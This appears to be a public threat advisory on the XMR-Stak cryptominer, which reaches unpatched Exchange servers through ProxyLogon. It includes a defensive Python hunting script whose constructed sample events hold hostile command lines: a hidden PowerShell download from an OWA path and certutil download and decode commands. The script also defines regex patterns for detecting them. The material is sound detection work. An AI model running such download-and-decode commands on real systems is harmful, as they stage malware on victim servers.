XMR-Stak Cryptocurrency Miner
First seen in early March 2021, XMR-Stak is a cryptomining trojan that targets vulnerable Exchange Server systems using a ProxyLogon exploit. Compromised systems are used both to mine cryptocurrency and to host payloads for new infections.
Affected platforms
The following platforms are known to be affected:
Threat details
Introduction
XMR-Stak is a newly observed cryptocurrency mining malware affecting unpatched Microsoft Exchange Server systems. The group operating it is using known ProxyLogon exploits to gain access to target systems.
Delivery & activities
Once a vulnerable server has been accessed, a PowerShell command is used to download a ZIP archive from the Outlook Web Access path of a previously compromised server. This file is not a legitimate archive but a batch script which, when executed, invokes certutil.exe to download and decode two additional spoofed ZIP archives.
The first of these files is another batch script, which decodes the second file, containing the miner and its configuration data, and injects the decoded payload into a running process. If successful, the script deletes both itself and the other ZIP archives, leaving only the running mining process.
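The delivery chain above leaves two host-side signals a defender can hunt for: process-creation events (the IIS worker process spawning PowerShell, a download from an OWA path, and certutil used as a downloader or decoder) and purported ZIP files that are really batch scripts. The following Python is an added example for this page, not NHS Digital's or the operators' code. It assumes Sysmon Event ID 1 records exported as dicts with the fields Image, ParentImage and CommandLine; the sample events, file paths and the 203.0.113.10 address (a documentation range) are constructed for illustration.

```python
"""Host-side hunting for the XMR-Stak delivery chain described above.

Added example for this page; it is not NHS Digital's or the operators' code.
It assumes Sysmon Event ID 1 (process creation) records exported as dicts with
the fields Image, ParentImage and CommandLine. All sample events, hosts, paths
and the 203.0.113.10 address (a documentation range) are constructed.
"""
import re

# Constructed sample events: a w3wp.exe-spawned PowerShell fetch from another
# server's OWA path, two certutil stages, and two benign processes.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": ("powershell -nop -w hidden -c \"(New-Object Net.WebClient)"
                     ".DownloadFile('http://203.0.113.10/owa/auth/update.zip',"
                     "'C:\\ProgramData\\update.zip')\"")},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": (r"certutil -urlcache -split -f "
                     r"http://203.0.113.10/owa/auth/a.zip C:\ProgramData\a.zip")},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil -decode C:\ProgramData\a.zip C:\ProgramData\a.bat"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil -verify -urlfetch C:\certs\ca.cer"},  # legitimate use
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
]

# certutil switches that turn it into a downloader or decoder (LOLBin abuse);
# ordinary certificate operations (-verify, -urlfetch, -addstore) do not match.
CERTUTIL_ABUSE = re.compile(r"-(urlcache|decode|decodehex)\b", re.IGNORECASE)
OWA_URL = re.compile(r"https?://[^\s'\"]+/owa/", re.IGNORECASE)
DOWNLOAD_VERB = re.compile(
    r"\b(DownloadFile|DownloadString|Invoke-WebRequest|iwr|curl|wget)\b",
    re.IGNORECASE)

# Real ZIP archives start with one of these local-header/end-of-directory magics.
ZIP_MAGICS = (b"PK\x03\x04", b"PK\x05\x06", b"PK\x07\x08")


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify_event(ev: dict) -> list:
    """Return the list of delivery-chain indicators matched by one event."""
    reasons = []
    image = _basename(ev.get("Image", ""))
    parent = _basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    # IIS worker process spawning a shell: web-shell / ProxyLogon post-exploitation.
    if parent == "w3wp.exe" and image in ("powershell.exe", "cmd.exe"):
        reasons.append("w3wp_child_shell")
    # Stage 1: PowerShell downloading a file from another server's OWA path.
    if image == "powershell.exe" and DOWNLOAD_VERB.search(cmd) and OWA_URL.search(cmd):
        reasons.append("powershell_owa_download")
    # Stage 2: certutil downloading or decoding the spoofed ZIP archives.
    if image == "certutil.exe" and CERTUTIL_ABUSE.search(cmd):
        reasons.append("certutil_download_or_decode")
    return reasons


def hunt(events) -> list:
    """Filter events down to those matching at least one indicator."""
    flagged = []
    for ev in events:
        reasons = classify_event(ev)
        if reasons:
            flagged.append({"event": ev, "reasons": reasons})
    return flagged


def looks_like_zip(data: bytes) -> bool:
    """True if the bytes begin with a ZIP magic.

    The dropped 'archives' are batch scripts, so a .zip under ProgramData or the
    OWA path that fails this check is worth pulling for analysis. Caveat:
    self-extracting archives carry a stub before the first PK header and would
    also fail, so treat a miss as a lead rather than a verdict.
    """
    return data[:4] in ZIP_MAGICS


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["reasons"], hit["event"]["CommandLine"][:70])
    # Constructed file contents: a decoy 'ZIP' that is really a batch script.
    print(looks_like_zip(b"@echo off\r\ncertutil -decode a.zip a.bat\r\n"))
```

The certutil rule deliberately matches only the download and decode switches so that routine certificate management on the same server does not page an analyst; the w3wp.exe parent check is the highest-value signal here, since the IIS worker process has no legitimate reason to spawn a shell on an Exchange server.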
XMR-Stak's configuration data states that it will only begin mining once it can establish a TLS connection to its configured pool, credited to the attacker's Monero wallet; because the mining traffic is encrypted, network detection has to rely on destination and port rather than on inspecting the Stratum protocol. Although funds began to appear in this wallet in early March, mining activity remained low until April, when it began to increase steadily, suggesting XMR-Stak's operators were ramping up their operations.
Remediation advice
Organisations are encouraged to review Microsoft's March 2021 Exchange Server Security Updates page and apply any relevant updates to address the ProxyLogon vulnerabilities exploited by XMR-Stak.
Additionally, to prevent and detect an infection, NHS Digital advises that:
- Secure configurations are applied to all devices.
- Security updates are applied at the earliest opportunity.
- Tamper protection settings in security products are enabled where available.
- Obsolete platforms are segregated from the rest of the network.
- IT usage policies are reinforced by regular training to ensure all users know not to open unsolicited links or attachments.
- Multi-factor authentication (MFA) and lockout policies are used where practicable, especially for administrative accounts.
- Administrative accounts are only used for necessary purposes.
- Remote administration services use strongly encrypted protocols and only accept connections from authorised users or locations.
- Systems are continuously monitored, and unusual activity is investigated, so that a compromise of the network can be detected as early as possible.
Please note that NCSC maintains guidance for securely configuring a wide range of end user device (EUD) platforms. For further details refer to their end user device security guidance pages.
Indicators of compromise
Last edited: 22 April 2021 3:13 pm